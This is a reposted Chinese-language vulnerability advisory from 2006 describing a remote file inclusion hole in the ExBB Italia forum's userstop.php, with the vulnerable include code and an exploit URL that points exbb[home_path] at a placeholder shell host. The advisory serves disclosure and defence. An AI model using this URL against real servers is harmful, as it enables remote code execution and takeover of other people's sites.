[转载]ExBB Italia userstop.php远程文件包含漏洞

信息来源：绿盟科技

发布日期：2006-08-29
更新日期：2006-08-31

受影响系统：
ExBB ExBB Italia <= v2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 19753

ExBB Italia是一款意大利语的论坛程序。

ExBB Italia在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

ExBB Italia的modules/userstop/userstop.php脚本没有正确验证exbb[home_path]参数的输入：

include($exbb[&#39;home_path&#39;].&#39;modules/userstop/data/userstop_conf.php&#39;);
include($exbb[&#39;home_path&#39;].&#39;modules/userstop/language/&#39;.$exbb[&#39;default_lang&#39;].&#39;/lang.php&#39;)

允许攻击者通过包含本地或外部资源的任意文件执行任意代码。成功攻击要求打开了register_globals。

<*来源：SHiKaA （SHiKaA@hotmail.com）
  
  链接：http://secunia.com/advisories/21681/
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL.COM?

建议：
--------------------------------------------------------------------------------
厂商补丁：

ExBB
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://exbb.clans.it/